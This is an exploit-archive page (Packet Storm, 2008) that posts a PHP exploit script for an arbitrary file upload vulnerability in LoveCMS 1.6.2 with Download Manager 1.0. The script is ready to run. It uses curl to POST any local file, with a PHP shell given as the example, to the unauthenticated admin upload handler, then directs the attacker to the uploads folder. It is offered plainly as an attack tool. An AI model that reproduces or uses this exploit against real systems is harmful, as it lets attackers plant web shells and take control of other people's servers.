exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

lovecms-upload.txt

lovecms-upload.txt
Posted Nov 26, 2008
Authored by cOndemned | Site condemned.r00t.la

LoveCMS version 1.6.2 Final with Download Manager version 1.0 suffers from an arbitrary file upload vulnerability.

tags | exploit, arbitrary, file upload
SHA-256 | 1928d25e01c9f26f138934a23ca7901ffbd80001e00209b3d5df3e23770b8096

lovecms-upload.txt

Change Mirror Download
<?php

/**
* LoveCMS 1.6.2 Final (Download Manager v1.0) Arbitrary File Upload Exploit
* Discovered && Exploited by cOndemned
*
* Download:
* http://www.thethinkingman.net/modules/download_manager/?id=16
*
* Description:
* This exploit allows attacker to upload any type of file [no extension
* filtration] ex. php shell...
*
* Uploader is adding random number on the begining of file name so user
* have to check it manually.
*
* for more information check /modules/download_manager/admin/index.php
* lines 10 - 27.
*
* Greetz:
* ZaBeaTy, str0ke, Necro, doctor, sid.psycho, 0in, TBH & Avantura...
*
*/

if($argc != 3)
{
printf("\n[~] Usage: php %s <target> <localfile>\n", $argv[0]);
printf("[~] Ex.: php %s localhost/lovecms shell.php\n\n", $argv[0]);
exit;
}

list($script, $target, $file) = $argv;

$xpl = curl_init();

curl_setopt($xpl, CURLOPT_URL, $target . '/modules/download_manager/admin/index.php');
curl_setopt($xpl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($xpl, CURLOPT_POST, true);
curl_setopt($xpl, CURLOPT_POSTFIELDS, array('file' => '@' . $file, 'submit' => 'Upload'));

curl_exec($xpl);
curl_close($xpl);

printf("[!] Go to the %s/uploads/ and check U'r file :)\n\n", $target);

?>


Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close